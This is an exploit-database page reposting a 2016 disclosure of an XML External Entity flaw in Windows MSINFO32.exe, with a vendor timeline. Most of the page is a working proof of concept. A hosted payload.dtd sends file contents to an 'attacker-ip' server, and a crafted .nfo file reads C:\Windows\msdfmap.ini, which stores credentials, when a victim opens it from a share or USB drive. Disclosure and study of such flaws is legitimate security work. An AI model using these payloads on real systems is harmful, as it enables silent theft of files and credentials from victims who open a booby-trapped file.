[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Microsoft MSINFO32.EXE 6.1.7601 - .NFO XML External Entity Injection Vulnerability

Author
hyp3rlinx
Risk
[
Security Risk High
]
0day-ID
0day-ID-26471
Category
local exploits
Date add
05-12-2016
Platform
windows
[+] Credits: John Page aka hyp3rlinx
 
 
Vendor:
=================
www.microsoft.com
 
 
 
Product:
==========================
Windows System Information
MSINFO32.exe v6.1.7601
 
 
Windows MSINFO32.EXE Displays a comprehensive view of your hardware, system
components, and software environment.
 
Parameters
FileName   : Specifies the file to be opened. This can be an .nfo, .xml, .txt, or .cab file.
 
 
 
Vulnerability Type:
===================
XML External Entity

 
 
 
Vulnerability Details:
=====================
 
Microsoft Windows MSINFO32.exe is vulnerable to XML External Entity attack
which can potentially allow remote attackers to
gain access to and exfiltrate files from the victims computer if they open
a malicious ".nfo" file via remote share / USB etc.
 
Upon open the file user will see error message like "System Information is
unable to open this .nfo file. The file might
be corrupt etc..
 
 
Tested Windows 7 SP1
 
 
Exploit code(s):
===============
 
Access and exfiltrate Windows "msdfmap.ini" file as trivial POC.
This file contains credentials for MS ADO Remote Data Services.
 
 
1) python -m SimpleHTTPServer 8080 (runs on attacker-ip / hosts payload.dtd)
 
 
 
2) "payload.dtd"
 
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker-ip:8080?%file;'>">
%all;
 
 
 
3) "FindMeThatBiatch.nfo" (corrupt .NFO file)
 
<?xml version="1.0"?>
<!DOCTYPE HYP3RLINX [
<!ENTITY % file SYSTEM "C:\Windows\msdfmap.ini">
<!ENTITY % dtd SYSTEM "http://attacker-ip:8080/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
 
 
 
Double click to open FindMeThatBiatch.nfo, user gets error MSINFO32
opens... attacker gets files.
 
OR open via Windows CL:
c:\>msinfo32  \\REMOTE-SHARE\FindMeThatBiatch.nfo
 
 
 
Disclosure Timeline:
======================================
Vendor Notification: September 4, 2016
Vendor Reply "not meet the bar for security servicing": September 7, 2016
December 4, 2016  : Public Disclosure

#  0day.today [2025-01-08]  #